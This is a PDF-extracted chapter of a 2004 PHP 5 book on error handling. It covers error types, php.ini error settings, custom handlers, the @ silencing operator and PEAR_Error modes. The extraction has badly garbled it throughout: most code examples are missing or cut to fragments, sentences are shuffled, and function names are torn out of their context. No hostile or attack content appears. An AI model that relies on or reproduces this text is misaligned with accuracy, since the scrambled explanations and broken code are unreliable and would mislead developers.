219 Gutmans_ch07 Page 191 Thursday, September 23, 2004 2:44 PM CHAPTER 7 Error Handling NTRODUCTION 7.1 I You can reduce the number of errors in your application by using good pro- gramming practices; however, many factors cause errors that are beyond our control in a script. Network outages, full hard disks, hardware failure, bugs in other PHP components, or programs your application interacts with can all cause errors that are not due to any fault of your PHP code. If you do nothing to deal with such errors, PHP’s default behavior is to show the error message to the user, along with a link to the page in the man- ual describing the function that failed, as well as the file name and line of the code that triggered the error. For most errors, PHP keeps running after dis- playing this message. See Figure 7.1. Fig. 7.1 PHP error message. 191

220 Gutmans_ch07 Page 192 Thursday, September 23, 2004 2:44 PM 192 Error Handling Chap. 7 This error message is really meant for you, the developer, not for the users of your site. Users would appreciate a page explaining, in layman’s terms, what went wrong and have no interest in documentation links or the location of your code. PHP provides a number of options to deal with such errors in a better way. After you finish reading this chapter, you will have learned The various types of errors your users might face ☞ ☞ What options you, as the developer, have within PHP for handling them How to write your own error handlers ☞ Converting between different error to reporting mechanisms ☞ 7.2 T E YPES OF RRORS 7.2.1 Programming Errors Sometimes errors occur due to errors in our code. In some ways, these are the easiest errors to deal with because they can be uncovered mostly by straight- forward testing, simply by trying out all the operations your application pro- vides. Handling them is just a matter of correcting the code. Syntax errors and other parse errors are caught 7.2.1.1 Syntax/Parse Errors when a file is compiled, before PHP starts executing it at all ?> This example contains an XML tag where PHP expects to find code. Run- ning this results in an error: Parse error: parse error in test.php on line 4 Hello! As you can see, the script did not even print before displaying an error message, because the syntax error was discovered during compilation, before PHP started executing the script.

221 Gutmans_ch07 Page 193 Thursday, September 23, 2004 2:44 PM 193 7.2 Types of Errors 7.2.1.2 Eval All syntax or parse errors are caught during compilation, except . In the case of , the code is compiled errors in code executed with eval() eval during the execution of the script. Here, we modify the previous example with : eval "); ?> This time, the output is different: Hello! Parse error: parse error in /home/ssb/test.php(4) : eval()'d code on line 1 As you can see, this time the error was displayed during execution. This is because code executed with itself is is not compiled until the eval() eval() executed. If your script includes another file that has a parse 7.2.1.3 Include / Require error, compilation will stop at the parse error. Code and declarations preceding the parse error are compiled, and those following the error are discarded. This means that you will get a half-compiled file if there is a parse error in it. : The following example uses two files, and test.php error.php $* $@ $2 :; <@> function bar() { print "bar\n"; } ?> error2.php (The line in the middle is not line noise; it is taken from the configuration file of sendmail, a UNIX mail server infamous for its unreadable configuration file format.)

222 Gutmans_ch07 Page 194 Thursday, September 23, 2004 2:44 PM 194 Error Handling Chap. 7 error3.php error3.php . the output from executing Output from executing Fig. 7.2 . error3.php and starts executing What happens here? First, PHP compiles test.php require error.php it. When it encounters the , but statement, it starts compiling function . However, the aborts after the parse error on line 7 of error.php foo() has already been defined because it was reached before the parse error. But, PHP never got around to defining the function due to the parse error. bar() foo() test.php Hello! Next, in execution of , calls the , PHP prints function because it has not been defined. , but fails trying to call that prints foo bar() 7.2.2 Undefined Symbols When PHP executes, it may encounter names of variables, functions, and so on that it does not know. Because PHP is a loosely typed interpreted lan- guage, it does not have complete knowledge about all symbol names, function names, and so on during compilation. This means that it may run into unknown

223 Gutmans_ch07 Page 195 Thursday, September 23, 2004 2:44 PM 7.2 Types of Errors 195 symbols during execution. Although syntax errors are caught before the code is executed, errors regarding undefined symbols occur while the code runs. 7.2.2.1 Variables and Constants Variables and constants are not dramatic, and they go by with just a notice (see the section about PHP error levels later in this chapter): The output is Notice: Undefined variable: undefined_variable in test.php on line 3 NULL Notice: Use of undefined constant UNDEFINED_CONSTANT - assumed 'UNDEFINED_CONSTANT' in test.php on line 4 string(18) "UNDEFINED_CONSTANT" Still alive! As you can see, the undefined variable evaluates to , while the unde- NULL fined constant evaluates to a string with the name of the constant. The error messages displayed are just notices, which is the least significant type of PHP error messages. Using undefined variables in PHP is not an error, just sloppy coding for some practice. Read the section on register_global security XXX ADDREF examples of what this could lead to in the worst-case scenario. Technically, using undefined variables is okay, and if you disable notices it will not produce any error messages. However, because notices come in handy for other things (such as noticing undefined constants!), we recommend that you keep reporting them enabled and fix your undefined variables. As a last resort, you can silence the expressions that cause notices individually statement. with the @ Undefined constants are bugs. A side effect of using an undefined con- stant is that it returns a string with the name of the constant, but never rely on this. Put your strings in quotes.

224 Gutmans_ch07 Page 196 Thursday, September 23, 2004 2:44 PM Error Handling Chap. 7 196 7.2.2.2 Array Indexes Consider this example: \n"; } ?> If the page serving this script is requested without any parameters, it GET displays a notice: test.php(3) : Notice - Undefined index: name 7.2.2.3 Functions and Classes Although PHP keeps executing after run- ning across an undefined variable or constant, it aborts whenever it encoun- ters an undefined function or class: The output is Yoda says: Fatal error: Call to undefined function: undefined_this_function_is() in test.php on line 4 The second print on line 5 was never executed because PHP exits with a fatal error when it tries to call the undefined function. The same thing happens with an undefined class:

225 Gutmans_ch07 Page 197 Thursday, September 23, 2004 2:44 PM 7.2 Types of Errors 197 The output is Yoda says: Fatal error: Class 'undefined_class' not found in test.php on line 4 Classes have one exception. If there is a user-defined function called __autoload , it is called when PHP runs across an undefined class. If the class is returns, the newly loaded class is used, and no fatal __autoload defined after error occurs. 7.2.2.4 Logical Errors Discovering parse errors or undefined symbols is rela- tively easy. A more subtle type of programming error is a , errors logical error that are in the structure and logic of the code rather than just the syntax. The best ways to find logical errors is testing combined with code reviews. 7.2.3 Portability Errors 7.2.3.1 Operating System Differences Although PHP itself runs on many different platforms, that does not automatically make all PHP code 100 per- cent platform-independent. There are always some OS-specific issues to con- sider. Here are some examples: PHP functions that are available only on a specific platform ☞ PHP functions that are available on a specific platform not ☞ PHP functions that differ slightly on different platforms ☞ ☞ Which character is used to separate path components in file names ☞ External programs or services that are not available on all platforms With all the different options available 7.2.3.2 PHP Configuration Differences in PHP’s configuration file ( php.ini ), it is easy to get into trouble when making assumptions about these settings. ini option. If this option is One common example is the magic_quotes_gpc function) on all external enabled, PHP adds slashes (like the addslashes() data. If you write your code on a system with this option disabled, and then move it to a server with enabled, your user input will suffer magic_quotes_gpc from “backslash pollution.” The correct way to handle such variations is to check your PHP code and function, and make the see whether an option is enabled with the ini_get() appropriate adjustments.

226 Gutmans_ch07 Page 198 Thursday, September 23, 2004 2:44 PM 198 Error Handling Chap. 7 For example, in the case, you should do this: magic_quotes_gpc query("INSERT INTO emails VALUES(?)", array($_GET["email"])); ?> register_globals GET , The , register_globals setting determines whether PHP should import POST cookie, environment, or server variables as global variables. In re-usable code, ; instead, use the superglobal variables pro- avoid relying on register_globals and $_GET ). vided for accessing them ( friends register_argc_argv $argc $argv This variable controls whether the global variables should be and set. In the CLI version of PHP, these are set by default and required for PHP to access command-line parameters. , magic_quotes_runtime magic_quotes_gpc is the name of a PHP feature that automatically quotes input Magic quotes data, by using the addslashes() function. Historically, this was used so that form data could be used directly in SQL queries without any security or quot- ing issues. Today, form data is used for much more, and magic quotes quickly get in the way. We recommend that you disable this feature, but portable code must be aware of these settings and deal with them appropriately by calling on GPS ( , POST , and cookie) data. GET stripslashes() y2k_compliance set to on causes PHP to display four-digit years instead of The y2k_compliance two-digit years. Oddly enough, the only value that is known to cause problems with some browsers is , which is why it is off on by default. unserialize_callback_func This setting is a string with the name of the function used for de-serializing function is used. unserialize() data when the arg_separator.input When receiving and POST form data, the ampersand character (&) is used GET by default to separate key-value pairs. With this option, the separator charac- ter can be changed to something else, which could cause portability problems. allow_url_fopen By default, PHP’s file functions support reading and writing URLs. If this option is set to false , URL file operations are disabled. You may need to deal with this in portable code, either by having a userland implementation in

227 Gutmans_ch07 Page 199 Thursday, September 23, 2004 2:44 PM 7.2 Types of Errors 199 reserve, or by checking whether this option is set upon startup and refuse to run if URL file operations are not allowed. 7.2.3.3 SAPI Differences PHP is not only available for many different oper- ating systems, but it also offers native interfaces to a range of different Server SAPIs in PHP lingo. The most common PHP SAPI is the Apache 1.3 APIs, or module; others are CGI, CLI, the IIS filter, the embeddable version of PHP, and so on. Some SAPIs offer PHP functions that are available only in that SAPI. For example, the Apache 1.3 SAPI offers a function called apache_note() to pass information to other Apache modules. Table 7.1 shows some SAPI-specific functions. Table 7.1 SAPI-Specific Functions SAPI Layers that Define It Function ApacheRequest (class) apache_hooks apache_lookup_uri apache, apache_hooks, apache2filter apache_request_headers apache, apache_hooks, apache2filter apache_response_headers apache, apache_hooks, apache2filter apache_note apache, apache_hooks, apache2filter apache_setenv apache, apache_hooks, apache2filter apache_getenv apache, apache_hooks apachelog apache, apache_hooks apache_child_terminate apache, apache_hooks apache_exec_uri apache, apache_hooks getallheaders aolserver, apache, apache_hooks, apache2filter smfi_setflags milter smfi_settimeout milter smfi_getsymval milter smfi_setreply milter smfi_addheader milter smfi_chgheader milter smfi_addrcpt milter smfi_delrcpt milter smfi_replacebody milter virtual apache, apache_hooks, apache2filter

228 Gutmans_ch07 Page 200 Thursday, September 23, 2004 2:44 PM 200 Error Handling Chap. 7 Portability errors can be tricky to find 7.2.3.4 Dealing with Portability because they require that you test your code thoroughly in different configura- tions on different systems. However, proper testing and code reviews are the best ways to find portability problems. Of course, if you write and deploy all of your code on the same platform with a homogenous configuration, you may never run into any portability problems. Awareness of portability issues is a good thing anyway; it enables you to write better, more re-useable, and more robust code. Fixing portability errors may be easy, such as checking the ini setting, as example. But it may be more difficult as well. in the previous magic_quotes_gpc You may need to parse the output of a command differently for different oper- ating systems, or provide a fallback implementation written in PHP for some- thing available only on some platforms. In some cases, what you do is not even possible to do in a portable way. In general, the best approach to portability problems is hiding the oper- ating system or SAPI details in a code layer, abstracting away the problem. System class from PEAR, which pro- One example of such an abstraction is the vides PHP implementations of some common UNIX commands and other com- mon operations that are OS-specific. 7.2.3.5 Portability Tools PEAR class: System System PEAR class is available as part of the basic PEAR install: The PEAR class: OS_Guess The class uses the php_uname() function to determine on which OS_Guess operating system it is running. It also provides ways of generalizing and com- paring OS signatures: getSignature() . "\n"; if ($os->matchSignature("linux-*-i386")) {

229 Gutmans_ch07 Page 201 Thursday, September 23, 2004 2:44 PM 7.2 Types of Errors 201 print "Linux running on an Intel x86 CPU\n"; } ?> Example output: OS signature: linux-2.4-i386-glibc2.1 Linux running on an Intel x86 CPU 7.2.4 Runtime Errors Once code is up and running, non-fatal runtime errors are the most common type of error in PHP. Runtime refers to errors that occur during execution of the code, which are not usually programming errors but caused factors outside PHP itself, such as disk or network operations or database calls. PHP has an error-reporting mechanism that is used for all errors trig- gered inside PHP itself, either during compilation of the script or when execut- ing a built-in function. You can use this error-reporting mechanism from a script as well, although there are more powerful ways of reporting errors (such as exceptions). The rest of this chapter focuses on some forms of runtime errors. Even perfectly good code may produce runtime errors, so everyone has to deal with them in one way or another. fopen() fails because a file is miss- Examples of runtime errors occur when mysql_connect() ing, when fails because you specified the wrong username, if fsockopen() fails because your system runs out of file descriptors, or if you tried inserting a row into a table without providing a required not-null column. 7.2.5 PHP Errors The error mechanism in PHP is used by all built-in PHP functions. By default, this simple mechanism prints an error message with file and line number and exits. In the previous section, we saw several examples of PHP errors. PHP errors are categorized by an error level ranging 7.2.5.1 Error Levels from notices to fatal errors. The error level tells you how serious the error is. Most errors may be caught with a custom error handler, but some are unre- coverable. E_ERROR This is a fatal, unrecoverable error. Examples are out-of-memory errors, uncaught exceptions, or class redeclarations.

230 Gutmans_ch07 Page 202 Thursday, September 23, 2004 2:44 PM 202 Error Handling Chap. 7 E_WARNING This is the most common type of error. It normally signals that some- thing you tried doing went wrong. Typical examples are missing function parameters, a database you could not connect to, or division by zero. E_PARSE Parse errors occur during compilation, and force PHP to abort before exe- cution. This means that if a file fails with a parse error, none of it will be exe- cuted. E_STRICT constant. The E_ALL This error level is the only one not included in the reason for this is to make transition from PHP 4 to PHP 5 easier; you can still run PHP 4 code in PHP 5. E_NOTICE be doing may Notices are PHP’s way to tell you that the code it runs something unintentional, such as reading that undefined variable. It is good practice to develop with notices enabled so that your code is “notice-safe” before pushing it live. On your production site, you should completely disable HTML errors. E_CORE_ERROR This internal PHP error is caused by an extension that failed starting up, and it causes PHP to abort. E_COMPILE_ERROR Compile errors occur during compilation, and are a variation of . E_PARSE This error causes PHP to abort. E_COMPILE_WARNING This compile-time warning warns users about deprecated syntax. E_USER_ERROR This user-defined error causes PHP to abort execution. User-defined errors ( ) are never caused by PHP itself, but are reserved for scripts. E_USER_* E_USER_WARNING cause PHP to exit. Scripts may use it to This user-defined error will not E_WARNING . signal a failure corresponding to one that PHP would signal with E_USER_NOTICE This user-defined notice may be used in scripts to signal possible errors (analogous to E_NOTICE ). php.ini configuration settings control which 7.2.5.2 Error Reporting Several errors should be displayed and how. error_reporting (Integer) This setting is the default error reporting for every script. The parameter E_ALL for everything or a logical may be any of the constants listed here, E_ALL & ~E_NOTICE (for everything except notices). expression such as

231 Gutmans_ch07 Page 203 Thursday, September 23, 2004 2:44 PM 7.2 Types of Errors 203 (Boolean) display_errors This setting controls whether errors are displayed as part of PHP’s out- by default. On put. It is set to (Boolean) display_startup_errors This setting controls whether errors are displayed during PHP startup. Off by default and is meant for debugging C extensions. It is set to error_prepend_string (String) This string is displayed immediately the error message when dis- before played in the browser. (String) error_append_string the error message when dis- This string is displayed immediately after played in the browser. track_errors (Boolean) is defined in the $php_errormsg When this setting is enabled, the variable scope PHP is in when an error occurs. The variable contains the error mes- sage. (Boolean) html_errors This setting controls whether HTML formatting is applied to the error message. The default behavior is to display HTML errors, except in the CLI version of PHP (see Chapter 16, “PHP Shell Scripting”). (Boolean) xmlrpc_errors This setting controls whether errors should be displayed as XML-RPC faults. (Integer) xmlrpc_error_number is enabled. xmlrpc_errors This XML-RPC fault code is used when (Boolean) log_errors This setting controls whether errors should be logged. The log destina- setting. By default, errors are logged to the error_log tion is determined by the web server’s error log. log_errors_max_len (Integer) log_errors is This is the maximum length of messages logged when enabled. Messages exceeding this length are still logged, but are truncated. (String) error_log This setting determines where to place logged errors. By default, they are passed on to the web server’s error-logging mechanism, but you may also specify a file name, or syslog to use the system logger. Syslog is supported for UNIX-style systems only. ignore_repeated_errors (Boolean) When enabled, this setting makes PHP not display the exact same mes- sage two or more times in a row. (Boolean) ignore_repeated_source When enabled, PHP will not display an error originating from the same line in the same file as the last displayed error. It has no effect if ignore_repeated_errors is not enabled.

232 Gutmans_ch07 Page 204 Thursday, September 23, 2004 2:44 PM 204 Error Handling Chap. 7 php.ini error-handling settings for development servers: Here is a good set of error_reporting = E_ALL display_errors = on html_errors = on log_errors = off Notices are enabled, which encourages you to write notice-safe code. You will quickly spot problems as you test with your browser. All errors are shown in the browser, so you spot them while developing. For production systems, you would want different settings: error_reporting = E_ALL & ~E_NOTICE display_errors = off log_errors = on html_errors = off error_log = "/var/log/httpd/my-php-error.log" ignore_repeated_errors = on ignore_repeated_source = on Here, no error messages are displayed to the user; they are all logged to /var/log/httpd/my-php-error.log . HTML formatting is disabled, and repeat- ing errors are logged only once. Check the error log periodically to look for problems you did not catch during testing. The important thing to keep in mind is that error messages printed by PHP are meant for developers, not for the users of the site. Never expose PHP error messages directly to the user, catch the error if possible, and present the user with a better explanation of what went wrong. Instead of having PHP print or log the error 7.2.5.3 Custom Error Handlers message, you can register a function that is called for each error. This way, you can log errors to a database or even send an email alert to a pager or to mobile phone. The following example logs all notices to /var/log/httpd/my-php-errors.log and converts other errors to PEAR errors:

233 Gutmans_ch07 Page 205 Thursday, September 23, 2004 2:44 PM 7.2 Types of Errors 205 Sometimes, you may wish to run your script with a 7.2.5.4 Silencing Errors high error level, but some things you do often produce a notice. Or, you may want to completely hide PHP’s error messages from time to time, and would $php_errormsg rather use in another error-reporting mechanism, such as an exception or PEAR error. statement prefix. When a @ In this case, you can silence errors with the statement or expression is executed with a in front, the error level is reduced @ to 0 for that statement or expression only: get('id', $_GET['id']); print "The name you are looking for is $name!
\n"; } ?> When running this example with set to E_ALL , a notice error_reporting 'id' index in the $_GET will be triggered if there is no array. However, because we prefix the expression with the silencing operator , no error message is dis- @ played. Custom error handlers will be called regardless of the silencing operator; only the built-in error displaying and logging mechanisms are affected. This is something you should be aware of if you define your own error handler, so your handler does not report silenced errors unintentionally. Because silenced errors have the error_reporting setting temporarily set to 0, we can use the following approach:

234 Gutmans_ch07 Page 206 Thursday, September 23, 2004 2:44 PM 206 Error Handling Chap. 7 } $file = basename($file); print "$type: $file:$line: $str\n"; } set_error_handler("my_error_handler"); trigger_error("not silenced error", E_USER_NOTICE); @trigger_error("silenced error", E_USER_NOTICE); ?> Here, we check the current error_reporting setting before displaying the is 0, the custom error handler aborts error message. If the error_reporting before printing anything. Thus, the silencing is effective even with our custom error handler. 7.3 PEAR E RRORS PEAR has its own error-reporting mechanism based around the principle of errors as types, and the ability to pass around errors as values. Many extras were built around this principle, to the point where PEAR errors almost func- tion like a poor man’s (in this case, PHP 4 users’) exception. Where PHP’s built-in error mechanism typically displays a message and false , a function returning a PEAR error gives an object a function returns PEAR_Error back that is an instance of or a subclass: getMessage() . ")\n"); } print "DB::connect ok!\n"; ?> In this introductory example, we try connecting to a MySQL database DB::connect returns a PEAR error. through PEAR DB. If the connection fails, PEAR::isError() static method returns a boolean that tells whether a The value is a PEAR error. If the return value from DB::connect is a PEAR error, the connection attempt has failed. In this case, we call getMethod() in the error object to retrieve the error message, print it, and abort.

235 Gutmans_ch07 Page 207 Thursday, September 23, 2004 2:44 PM 7.3 PEAR Errors 207 This is a simple example of how PEAR’s error handling works. There are many ways of customizing it that we will look at later. First, we examine the different ways of raising and catching PEAR errors, and get an overview of the class. PEAR_Error 7.3.0.1 Catching Errors Unless an error handler that aborts execution is configured, the return value of a function failing with a PEAR error will be the error object. Depending on the error-handling setup, some kind of action may have been taken already, but there is no provided way of telling. One of the code design implications of this is that PEAR error-handling defaults should always be set by the , or the script that PHP driving script started executing. If some included library starts setting up error-handling defaults or global resources such as INI entries, trouble awaits. 7.3.0.2 PEAR::isError() bool PEAR::isError(mixed candidate) true false depending on whether candidate is a or This method returns is an object that is an instance of PEAR_Error or a sub- candidate PEAR error. If PEAR::isError() returns true class, . 7.3.0.3 Raising Errors In PEAR terminology, errors are “raised,” although the easiest way of raising a PEAR error is returning the return value from a method called throwError is a simplified throwError . This is simply because method. PEAR uses the term raiseError to version of the original raising avoid confusion with PHP exceptions, which are thrown. The relative cost of raising a PEAR error compared to triggering a PHP error is high, because it involves object creation and several function calls. This means that you should use PEAR errors with care—keep them for fail- ures that should not normally happen. Prefer using a simple Boolean return value for the normal cases. This same advice is given in regards to using exceptions in PHP, as well as C++, Java, or other languages. When you use PEAR packages in your code, you need to deal with errors raised by the package. You can do this in one of two ways: whether you are in an object context, and whether your current class inherits the PEAR class. If your code does not run in an object context, such as from the global scope, inside a regular function or in a static method you need to call the static method: PEAR::throwError() getMessage() . "\n"); } print "You were lucky, this time.\n";

236 Gutmans_ch07 Page 208 Thursday, September 23, 2004 2:44 PM 208 Error Handling Chap. 7 function lucky() { if (rand(0, 1) == 0) { return PEAR::throwError('tough luck!'); } } ?> When errors are raised with static method calls, the defaults set with PEAR::setErrorHandling() are applied. The other way of raising errors is when your class has inherited PEAR, and your code is executed in an object context: throwError('tough luck!'); } return "lucky!"; } } $luck = new Luck; $test = $luck->testLuck(); if (PEAR::isError($test)) { die($test->getMessage() . "\n"); } print "$test\n"; ?> throwError() When is called in an object context, defaults set in that object with are applied first. If no defaults are set $object->setErrorHandling() for the object, the global defaults apply, as with errors raised statically (like in the previous example). [object PEAR::throwError([string message] , ( 7.3.0.4 PEAR::throwError() [string userinfo] ) [int code] , This method raises a PEAR error, applying default error-handling set- tings. Which defaults are actually applied depends on how the method is called. If throwError() PEAR::throwError() , the glo- is called statically, such as bal defaults PEAR::set- are applied. The global defaults are always set with ErrorHandling() and called statically. When throwError() is called from an

237 Gutmans_ch07 Page 209 Thursday, September 23, 2004 2:44 PM 7.3 PEAR Errors 209 $this->throwError() object context, such as , the error-handling defaults of $this are undefined, the global are applied first. If the defaults for $this defaults are applied instead. in PHP, you may be in If you are not intimate with the semantics of $this for some surprises when using PEAR error defaults. If you call a method stat- ically from within an object (where $this has a value), the value of $this will actually be defined inside the statically called method as well. This means that if you call will be defined PEAR::throwError() from inside an object, $this inside and refer to the object from which you called PEAR::throwError() PEAR::throwError() . In most cases, this has no effect, but if you start using PEAR’s error-handling mechanism to its fullest, you should be aware of this so you are not surprised by the wrong error-handling defaults being applied. PEAR::raiseError() 7.3.0.5 [string message] , object PEAR::raiseError ( [ int mode] [string [mixed options] , [string userinfo] , , [int code] , , ) error_class] [bool skipmsg] This method is equivalent to throwError() but with more parameters. Normally, you would not need all these extra options, but they may come in mes- handy if you are making your own error system based on PEAR errors. , code , and userinfo are equivalent to the same throwError() parameters. sage and options PEAR_Error constructor parame- mode are equivalent to the same description). The two remaining parameters PEAR_Error ters (see the following skipmsg : error_class and are string $error_class (default "PEAR_Error") This class will be used for the error object. If you change this to some- PEAR_Error , make sure that the class you are giving here thing other than , or PEAR::isError() will not give correct results. PEAR_Error extends bool $skipmsg (default false) This rather obscure parameter tells the raiseError() implementation to message parameter completely, and simply pretend there is no such skip the skipmsg parameter. If true , the constructor of the error object is called with is message as the first parameter. This may be useful one less parameter, without for extended error mechanisms that want to base everything on error codes. 7.3.1 The PEAR_Error Class The PEAR-Error class is PEAR’s basic error-reporting class. You may extend and specialize it for your own purposes if you need, PEAR:isError() will still recognize it. void PEAR_Error ( 7.3.1.1 PEAR_Error constructor , [int [string message] , [int mode] , [mixed options] , [string userinfo] ) code]

238 Gutmans_ch07 Page 210 Thursday, September 23, 2004 2:44 PM 210 Error Handling Chap. 7 All PEAR_Error’s constructor parameters are optional and default to the null value, except message , which defaults to unknown error. However, nor- mally, you do not create PEAR errors with the new statement, but with a fac- PEAR::throwError() . or PEAR::raiseError() tory method such as string $message (default "unknown error") This is the error message that will be displayed. This parameter is $code or . $message optional, but you should always specify either int $code (default –1) The error code is a simple integer value representing the nature of the error. Some PEAR error-based mechanisms (such as the one in PEAR DB) use this parameter as the primary way of describing the nature of errors, and leave the message for a plain code to text mapping. Error codes are also good in conjunction with localized error messages, because they provide a language- neutral description of errors. It is good practice to always specify an error code, if nothing else to allow for cleaner, more graceful error handling. int $mode (default PEAR_ERROR_RETURN) This is the error mode that will be applied to this error. It may have one of the following values: ☞ PEAR_ERROR_RETURN ☞ PEAR_ERROR_PRINT ☞ PEAR_ERROR_DIE ☞ PEAR_ERROR_TRIGGER ☞ PEAR_ERROR_CALLBACK The meaning of the different error modes is discussed in the following “Handling PEAR Errors” section. mixed $options This parameter is used differently depending on what error mode was specified: PEAR_ERROR_PRINT and PEAR_ERROR_DIE , the $options parameter contains For ☞ format string that is used when printing the error message. printf a ☞ For PEAR_ERROR_TRIGGER , it contains the PHP error level used when trig- E_USER_NOTICE , but it may also gering the error. The default error level is E_USER_WARNING be set to E_USER_ERROR . or parameter is the call- Finally, if is PEAR_ERROR_CALLBACK ☞ $options $mode , the able that will be given the error object as its only parameter. A callable is either a string with a function name, an array of class name and method name (for static method calls), or an array with an object handle and method name (object method calls).

239 Gutmans_ch07 Page 211 Thursday, September 23, 2004 2:44 PM 7.3 PEAR Errors 211 string $userinfo This variable holds extra information about the error. An example of content would be the SQL query for failing database calls, or the filename for failing file operations. This member variable containing user info may be addUserInfo() method. appended to with the 7.3.1.2 PEAR_Error::addUserInfo() void addUserInfo(string info) This variable appends to the error’s user info. It uses the character sequence info “ ** ” to separate different user info entries. getBacktrace([int PEAR_Error::getBacktrace([frame]) 7.3.1.3 array frame]) This method returns a function call debug_backtrace() backtrace as returned by from the PEAR_Error saves the backtrace before constructor. Because PEAR_Error raising the error, using exceptions through PEAR errors will preserves the backtrace. The optional integer argument is used to select a single frame from the backtrace, with index 0 being the innermost frame (frame 0 will always be in PEAR_Error the class). 7.3.1.4 mixed getCallback() PEAR_Error::getCallback() PEAR_ERROR_CALLBACK error mode. This method returns the "callable" used in the int getCode() 7.3.1.5 PEAR_Error::getCode() This method returns the error code. string getMessage() 7.3.1.6 PEAR_Error::getMessage() This method returns the error message. PEAR_Error::getMode() int getMode() 7.3.1.7 PEAR_ERROR_RETURN and so on). This method returns the error mode ( PEAR_Error::getType()string getType() 7.3.1.8 This method returns the type of PEAR error, which is the lowercased class name of the error class. In most cases, the type will be (in lower- pear_error case), but it varies for packages that implement their own error-handling PEAR_Error . classes inheriting 7.3.1.9 PEAR_Error::getUserInfo() string getUserInfo() This method returns the entire user info string. Different entries are sepa- rated with the string “ ** ” (space, two asterisks, space).

240 Gutmans_ch07 Page 212 Thursday, September 23, 2004 2:44 PM 212 Error Handling Chap. 7 7.3.2 Handling PEAR Errors The default behavior for PEAR errors is to do nothing but return the object. However, it is possible to set an error mode that will be used for all consequent object is cre- PEAR_Error errors raised. The error mode is checked when the ated, and is expressed by a constant: This previous example is simplified here by using a global default error handler that applies to every PEAR error that has no other error mode config- PEAR_ERROR_DIE , which prints the error message ured. In this case, we use using the parameter as printf format string, and then die. The advantage of this approach is that you can code without checking errors for everything. It is not very graceful, but as you will see later in the chapter, you may also apply temporary error modes during operations that need more graceful handling. PEAR::setErrorHandling() 7.3.2.1 ( int void PEAR::setErrorHandling , [ ) mode mixed options] This method sets up default error-handling parameters, globally or for individ- ual objects. Called statically, it sets up global error handling defaults: PEAR::setErrorHandling(PEAR_ERROR_TRIGGER); PEAR_ERROR_TRIGGER , Here, we set the global default error handling to which makes all PEAR errors trigger PHP errors. Called when part of an object, this method sets up error-handling defaults for that object only: $dbh->setErrorHandling(PEAR_ERROR_CALLBACK, 'my_error_handler'); In this example, we set the defaults so every error object raised from within the $dbh object is passed as a parameter to my_error_handler() .

241 Gutmans_ch07 Page 213 Thursday, September 23, 2004 2:44 PM 7.3 PEAR Errors 213 7.3.3 PEAR Error Modes 7.3.3.1 PEAR_ERROR_RETURN This default error mode does nothing beyond creating the error object and returning it. PEAR_ERROR_PRINT In this mode, the error object automatically 7.3.3.2 prints the error message to PHP’s output stream. You may specify a printf format string as a parameter to this error mode; we will look at that later in this chapter. , PEAR_ERROR_PRINT This mode does the same thing as PEAR_ERROR_DIE 7.3.3.3 format string is still printf except it exits after displaying the error message. The applied. PEAR_ERROR_TRIGGER 7.3.3.4 The trigger mode passes the error message on to PHP’s built-in trigger_error() function. This mode also takes an optional parameter which is the PHP error level used in the trigger_error() E_USER_NOTICE , E_USER_WARNING and call (one of ). Wrapping PHP E_USER_ERROR errors inside PEAR errors may be useful, for example, if you want to exploit the flexibility of PEAR errors but all the different built-in logging capabilities of PHP’s own error handling. Finally, if none of the preceding error 7.3.3.5 PEAR_ERROR_CALLBACK modes suits your needs, you may set up an error-handling function and do the rest yourself. 7.3.4 Graceful Handling 7.3.4.1 bool PEAR::pushErrorHandling ( int mode , PEAR::pushErrorHandling() ) [mixed options] This method pushes another error-handling mode on top of the default han- dler stack. This error mode will be used until is called. popErrorHandling() You may call this method statically or in an object context. As with other methods that have this duality, global defaults are used when called statically, and the object defaults when in an object context. Here is an extended version of the first example. After connecting, we insert some data into a table, and handle duplicate keys gracefully:

242 Gutmans_ch07 Page 214 Thursday, September 23, 2004 2:44 PM 214 Error Handling Chap. 7 // temporarily set the global default error handler PEAR::pushErrorHandling(PEAR_ERROR_RETURN); $res = $dbh->query("INSERT INTO mytable VALUES(1, 2, 3)"); // PEAR_ERROR_DIE is once again the active error handler PEAR::popErrorHandling(); if (PEAR::isError($res)) { // duplicate keys will return this error code in PEAR DB: if ($res->getCode() == DB_ERROR_ALREADY_EXISTS) { print "Duplicate record!\n"; } else { PEAR::throwError($res); } } ?> First, we set up a default error handler that prints the error message and exits. After successfully connecting to the database (the default error handler as PEAR_ERROR_RETURN will make the script exit if the connection fails), we push return an the global default error mode while executing a query that may error. Once the query is done, we pop away the temporary error mode. If the query returned an error, we check the error code to see if it is a situation we know how to handle. If it was not, we re-throw the error, which causes the PEAR_ERROR_DIE ) to apply. original global defaults ( bool PEAR::popErrorHandling() 7.3.4.2 PEAR::popErrorHandling() This is the complimentary method to PEAR::pushErrorHandling() and will pop (remove) the topmost mode from the error handling stack. It may be called statically or in an object context, as with pushErrorHandling() . PEAR::expectError() int expectError(mixed expect) 7.3.4.3 This method is a more specific approach to the same problem that tries to solve: making an exception (in the traditional sense pushErrorHandling() of the word) for errors we want to handle differently. The expectError() approach is to look for one or more specified error codes or error messages, and force the error mode to PEAR_ERROR_RETURN for matching errors, thus disabling any handlers. expect parameter is an integer, it is compared to the error code of If the the raised error. If they match, any specified error handler is disabled, and the error object is silently returned. expect is a string, the same thing is done with the error message, and If as a special case the string “*” matches every error message. Thus, expectEr- has the same effect as ror('*') . pushErrorHandling(PEAR_ERROR_RETURN) Finally, if expect is an array, the previous rules are applied to each ele- ment, and if one matches, the error object is just silently returned.

243 Gutmans_ch07 Page 215 Thursday, September 23, 2004 2:44 PM 7.3 PEAR Errors 215 The return value is the new depth of the object’s expect stack (or the glo- bal expect stack if called statically). instead of pushError Let’s repeat the last example using expectError() : Handling() expectError(DB_ERROR_ALREADY_EXISTS); $res = $dbh->query("INSERT INTO mytable VALUES(1, 2, 3)"); // back to PEAR_ERROR_DIE again: $dbh->popExpect(); if (PEAR::isError($res) && $res->getCode() == DB_ERROR_ALREADY_EXISTS) { print "Duplicate record!\n"; } ?> In this example, we use the per-object default error handling in the $dbh object instead of the global default handler to implement our graceful dupli- pushErrorHandling() approach is cate handling. The main difference from the that we don’t have to re-throw/raise the error because our “duplicate handling code” is called if a duplicate error occurred, and not if any error occurred only pushErrorHandling() as would have been the case with . 7.3.4.4 PEAR::popExpect() array popExpect() This method compliments expectError() , and removes the topmost element in the expect stack. As with the other error-handling methods, it applies to object or global defaults depending on whether it is called statically or in an object context. The return value is an array with the expected error codes/messages that were popped off the expect stack. 7.3.4.5 PEAR::delExpect() bool delExpect(mixed error_code) error_code from every level in the expect stack, returning This method removes true if anything was removed.

